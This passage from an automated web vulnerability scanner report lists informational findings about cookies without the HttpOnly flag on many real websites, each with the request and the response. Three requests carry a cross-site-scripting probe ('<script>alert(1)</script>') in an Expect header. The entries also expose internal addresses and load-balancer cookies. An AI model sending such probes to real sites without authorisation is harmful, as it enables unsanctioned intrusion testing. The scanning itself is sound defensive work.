HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.occasions365.com/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=05bpfs555j2atk55etl0blfa; path=/; HttpOnly
Set-Cookie: PSGUID=77c0faeb-bc42-4852-b207-eafe636ed3da; expires=Thu, 02-Jun-2011 10:39:28 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90G
P3P: CP="CAO PSA OUR"
Date: Tue, 03 May 2011 10:39:29 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-2=1426209802.20480.0000; path=/

13.199. http://www.ocfl.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ocfl.net
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=PKKPKPS192.168.255.102CKOWK; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ocfl.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=PKKPKPS192.168.255.102CKOWK; path=/
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Mon, 07 Jun 2010 19:50:51 GMT
Accept-Ranges: bytes
ETag: "801f66bb7a6cb1:b5a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:36:43 GMT

............ .h.......(....... ..... .............................................w..9d..p^..j..e...'....................................M...E...C...;...=...;...H...h..m............................<.
...[SNIP]...

13.200. http://www.oilshalegas.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oilshalegas.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

persist-identification=2509762001.20480.0000; expires=Tue, 03-May-2011 11:39:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oilshalegas.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:09:24 GMT
Set-Cookie: persist-identification=2509762001.20480.0000; expires=Tue, 03-May-2011 11:39:24 GMT; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

13.201. http://www.onedollaremailoffer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.onedollaremailoffer.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=173.193.214.243.1304422688211635; path=/; expires=Wed, 29-Apr-26 11:38:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onedollaremailoffer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:08 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: Apache=173.193.214.243.1304422688211635; path=/; expires=Wed, 29-Apr-26 11:38:08 GMT
Last-Modified: Tue, 26 Apr 2011 21:30:57 GMT
ETag: "16d3-e36-4a1d90a265cbb"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: image/x-icon

..............h...&... ..............(....... ...........@............................j6.'.......1........e..R..[....3...........d<..........zN..:...:...F...[(.....l!...,.......F!..............F...>
...[SNIP]...

13.202. http://www.orderupdate.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orderupdate.info
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServeroldweb_pool=2701136044.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orderupdate.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:12:46 GMT
Connection: keep-alive
Set-Cookie: BIGipServeroldweb_pool=2701136044.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

13.203. http://www.orthohomedefense.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orthohomedefense.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

class-default_Cookie=R1222450515; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orthohomedefense.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: class-default_Cookie=R1222450515; path=/
Date: Tue, 03 May 2011 10:47:35 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 05 Oct 2010 03:20:34 GMT
ETag: "2a85e7-276-491d624d7e480"
Accept-Ranges: bytes
Content-Length: 630
Cache-Control: max-age=86400
Expires: Wed, 04 May 2011 10:47:35 GMT
Content-Type: image/x-icon

BMv.......v...(... ... ....................................................................................................................."""&..........r"""""".........""""""""......."""""""""(.....
...[SNIP]...

13.204. http://www.ovationhair.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovationhair.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NS_VER=2011.1.0; domain=www.ovationhair.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ovationhair.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:58:19 GMT
Server: Apache
Content-Length: 0
Expires: 0
NS_RTIMER_COMPOSITE: 1231200972:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2011.1.0; domain=www.ovationhair.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: image/x-icon

13.205. http://www.petsupplies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petsupplies.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=A0FDEB6F4F0B6DC606ECF9AC5FE47954; Path=/; Domain=.petsupplies.com
TLTUID=A0FDEB6F4F0B6DC606ECF9AC5FE47954; Path=/; Domain=.petsupplies.com; expires=Tue, 03-05-2021 10:42:34 GMT
NSC_Qfut-wjqt=e24066363660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.206. http://www.photos-naturistes.fr/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.photos-naturistes.fr
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

300gp=R393521545; path=/; expires=Thu, 05-May-2011 22:21:18 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.photos-naturistes.fr
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: 300gp=R393521545; path=/; expires=Thu, 05-May-2011 22:21:18 GMT
Date: Tue, 03 May 2011 10:17:48 GMT
Server: Apache/2.2.X (OVH)
Vary: Accept-Encoding
Content-Length: 209
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

13.207. http://www.prosolutionpills.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prosolutionpills.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sswn=93c29678f0dbb8ba598f8f940fd43364; path=/
a=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
b=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
c=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
t=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
nn=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
src=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
hostid=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
ref=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
upsell=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
mh=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
cd=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
a=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
t=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
b=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
ref=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
upsell=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
mh=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/
src=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
cd=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.208. http://www.prostaff.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prostaff.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

atterro_sticky_cookie=R1973112888; path=/; expires=Wed, 04-May-2011 11:08:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prostaff.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: atterro_sticky_cookie=R1973112888; path=/; expires=Wed, 04-May-2011 11:08:31 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:50:14 GMT

13.209. http://www.quiltersclubofamerica.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.quiltersclubofamerica.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Tue, 03 May 2011 05:36:12 GMT; domain=quiltersclubofamerica.com; expires=Wed, 02-May-2012 10:36:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quiltersclubofamerica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.210. http://www.quotit.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.quotit.net
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

quotit_p=7uIt68C/MTFyA6qU3FWRfehvHF3PpeJrV59JP2L95j2KutDTplAXwB3cx5+rNvM3kxZsyYUpdraRcg==; path=/
TSd650ad=925e31390f7e851cba30036805d748b6ba451e4678c5257e4dbfd6ebc18847d073273ad5; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quotit.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:17:18 GMT
Connection: keep-alive
Content-Length: 5184
Set-Cookie: quotit_p=7uIt68C/MTFyA6qU3FWRfehvHF3PpeJrV59JP2L95j2KutDTplAXwB3cx5+rNvM3kxZsyYUpdraRcg==; path=/
Vary: Accept-Encoding
Set-Cookie: TSd650ad=925e31390f7e851cba30036805d748b6ba451e4678c5257e4dbfd6ebc18847d073273ad5; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IIS 7.0 Detailed Error - 404.
...[SNIP]...

13.211. http://www.realestateagentsfinder.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.realestateagentsfinder.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerexperthub_serv_POOL2=3001356460.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.realestateagentsfinder.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:43:02 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 1635
X-Powered-By: ASP.NET
Set-Cookie: BIGipServerexperthub_serv_POOL2=3001356460.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

13.212. http://www.realhog.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.realhog.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=220110ac00005000; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.realhog.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 3638
Content-Type: image/x-icon
Content-Location: http://www.realhog.com/favicon.ico
Last-Modified: Wed, 02 Jun 2010 22:52:10 GMT
Accept-Ranges: bytes
ETag: "aef403ca62cb1:97f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:39:30 GMT
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=220110ac00005000; Path=/

..............h...&... ..............(....... ....................................}..aac.....srz.........vr.................._^b.........^]S...{.....\Y|.d`......ONT.nkq.|x..........yvq.=5......khr...
...[SNIP]...

13.213. http://www.rlcarriers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rlcarriers.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

clever=psEc2O50elhJ0YkSyeSjHbgTv27DGvBBYD+212aoQK9PAG99I4+Vz9M0CJFysljyNeYwzvvEnn81eZg=; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rlcarriers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:43:12 GMT
Set-Cookie: clever=psEc2O50elhJ0YkSyeSjHbgTv27DGvBBYD+212aoQK9PAG99I4+Vz9M0CJFysljyNeYwzvvEnn81eZg=; path=/

13.214. http://www.rotary.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rotary.org
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BIGipServermoss_80=3867609610.20480.0000; path=/
BIGipServerrotary.org_80=3574272172.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rotary.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 1406
Date: Tue, 03 May 2011 10:30:56 GMT
Content-Type: image/x-icon
ETag: "{BB643D9B-3AC9-4924-B118-AC37B4AB3E9C},1"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=86404, no-check
X-Powered-By: ASP.NET
Last-Modified: Tue, 05 Feb 2008 17:14:02 GMT
ResourceTag: rt:BB643D9B-3AC9-4924-B118-AC37B4AB3E9C@00000000001
Exires: Mon, 18 Apr 2011 10:30:56 GMT
Cache-Control: private,max-age=0
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: BIGipServermoss_80=3867609610.20480.0000; path=/
Set-Cookie: BIGipServerrotary.org_80=3574272172.20480.0000; path=/

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

13.215. http://www.schneider.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.schneider.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_http_www=1413144225.30750.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schneider.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:11 GMT
Server: Apache/2.0.52 (Oracle)
Content-type: text/html; charset=UTF-8
Content-Length: 12594
Connection: close
Set-Cookie: BIGipServerpool_http_www=1413144225.30750.0000; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content
...[SNIP]...

13.216. http://www.smartbuyingsite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smartbuyingsite.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PSGUID=989fe701-43f4-44dd-9eff-5905346064ac; expires=Thu, 02-Jun-2011 10:39:18 GMT; path=/
BIGipServerWebfx_Alt=1308786698.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartbuyingsite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.smartbuyingsite.com/smartbuyingsite/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=et1igz45apwerz55qkckwtym; path=/; HttpOnly
Set-Cookie: PSGUID=989fe701-43f4-44dd-9eff-5905346064ac; expires=Thu, 02-Jun-2011 10:39:18 GMT; path=/
X-AspNet-Version: 2.0.50727
P3P: CP="CAO PSA OUR"
Server-Name: SF-WEB90E
Date: Tue, 03 May 2011 10:39:18 GMT
Content-Length: 0
Set-Cookie: BIGipServerWebfx_Alt=1308786698.20480.0000; path=/

13.217. http://www.smashbox.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smashbox.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NS_VER=2010.2.0; domain=www.smashbox.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smashbox.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:50 GMT
Server: Apache
Content-Length: 0
Expires: 0
NS_RTIMER_COMPOSITE: -2131118093:73686F702D6A6176613034312E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2010.2.0; domain=www.smashbox.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: image/x-icon

13.218. http://www.smccme.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smccme.edu
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

48224df762a14da7e33a6eebfc077554=f4bac11ce7797f7186d2bdd8f400eb03; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smccme.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:37:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Set-Cookie: 48224df762a14da7e33a6eebfc077554=f4bac11ce7797f7186d2bdd8f400eb03; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
ETag: 2b9423335f9e84557f306640e7ed058f
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:37:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 35755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...

13.219. http://www.songselect.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.songselect.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-a481ec4=a481482:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songselect.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1078
Content-Type: image/x-icon
Content-Location: http://www.songselect.com/favicon.ico
Last-Modified: Wed, 20 Oct 2010 17:16:19 GMT
Accept-Ranges: bytes
ETag: "8e649837a70cb1:22ce"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:47:28 GMT
Set-Cookie: Coyote-2-a481ec4=a481482:0; path=/

..............(...&... ..........N...(....... .................................................................................................p....w.....ww........................w....ww..........
...[SNIP]...

13.220. http://www.specialolympics.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.specialolympics.org
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.specialolympics.org&SiteLanguage=1033; path=/
EktGUID=1d7b4d90-f006-4b7f-bf02-61f282c138e2; expires=Thu, 03-May-2012 10:47:09 GMT; path=/
EkAnalytics=newuser; expires=Thu, 03-May-2012 10:47:09 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.specialolympics.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: http://www.specialolympics.org/pagenotfound.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.specialolympics.org&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=1d7b4d90-f006-4b7f-bf02-61f282c138e2; expires=Thu, 03-May-2012 10:47:09 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Thu, 03-May-2012 10:47:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:47:09 GMT
Content-Length: 171

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.specialolympics.org/pagenotfound.aspx">here</a></body>

13.221. http://www.stjulien.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stjulien.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=MUYYJOSWEB1CLKQ; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stjulien.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=MUYYJOSWEB1CLKQ; path=/
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 485
Date: Tue, 03 May 2011 10:27:33 GMT
X-Varnish: 1006377652
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

